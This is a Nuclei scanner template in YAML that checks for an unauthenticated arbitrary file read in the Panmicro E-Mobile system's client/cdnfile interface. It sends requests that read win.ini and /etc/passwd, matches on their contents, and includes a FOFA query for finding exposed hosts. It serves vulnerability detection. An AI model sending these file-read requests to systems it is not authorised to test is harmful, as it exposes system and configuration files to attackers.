nuclei-templates/http/vulnerabilities/other/panmicro-arbitrary-file-rea...

35 lines
1.3 KiB
YAML

id: panmicro-arbitrary-file-read
info:
name: Panmicro E-Mobile System - Arbitrary File Read
author: s4e-io
severity: high
description: |
The Panmicro E-Mobile client/cdnfile interface has an arbitrary file reading vulnerability. Unauthenticated attackers can use this vulnerability to read important system files, database configuration files, and so on.
reference:
- http://cn-sec.com/archives/3182931.html
- https://cn-sec.com/archives/3188605.html
metadata:
verified: true
max-request: 2
vendor: panmicro
product: e-mobile-system
fofa-query: app="泛微-EMobile"
tags: panmicro,e-mobile,lfi
http:
- method: GET
path:
- "{{BaseURL}}/client/cdnfile/1C/Windows/win.ini?windows"
- "{{BaseURL}}/client/cdnfile/C/etc/passwd?linux"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'contains_all(body,"bit app support","fonts","extensions") || regex("root:.*:0:0:", body)'
- 'contains_any(header,"application/octet-stream", "text/plain")'
- 'contains(header," attachment; filename=")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100b0a1317f8b3bcf59f608b90272b0035af9d26bb6919aac1352f0b3a158b480d1022058ffe9819c26810876ba9bad7bf9e90618e228b8b0e02c490e36ae482ee4495e:922c64590222798bb761d5b6d8e72950